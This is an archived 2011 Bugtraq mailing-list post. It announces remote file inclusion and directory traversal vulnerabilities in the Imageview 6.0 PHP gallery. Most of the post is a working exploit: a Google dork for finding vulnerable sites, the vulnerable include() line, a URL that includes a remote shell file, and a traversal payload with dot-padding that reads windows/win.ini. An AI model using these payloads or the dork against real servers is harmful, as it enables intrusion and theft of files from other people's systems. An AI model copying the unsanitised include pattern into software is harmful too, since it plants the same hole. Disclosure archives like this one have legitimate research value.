lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <201102271330.p1RDUmng016887@www5.securityfocus.com>
Date: Sun, 27 Feb 2011 06:30:48 -0700
From: difficult-511@...mail.com
To: bugtraq@...urityfocus.com
Subject: Imageview v6.0 Remote [and] Local Directory Traversal Vulnerability

##########################################################
# Exploit Title: Imageview v6.0 Remote [and] Local Directory Traversal Vulnerability
# Google Dork: inurl:"/imageview6/"
# home : www.D99Y.com
# Date: 27/2/2011 
# Author: Difficult 511
# Software Link: http://www.blackdot.be/files/downloads/imageview6-install.zip
# Version: 6.0
# Tested on: windows xp sp2
##########################################################
#
# file :
#
# admin/index.php
#
# exploit [ Remote ] : 
#
# http://localhost/imageview6/admin/index.php?page= [shell.txt]
#
# Code : 
#
#<?php include('pages/'.$_GET['page'].'.php'); ?>
#
# exploit [ Local ] :
#
# http://localhost/imageview6/admin/index.php?page=unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
#
# Now see the file :  /windows/win.ini
#
# And see Page ;)
#
##########################################################

Greetz : 

NassRawI and all members D99Y.com

Enjoy :)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ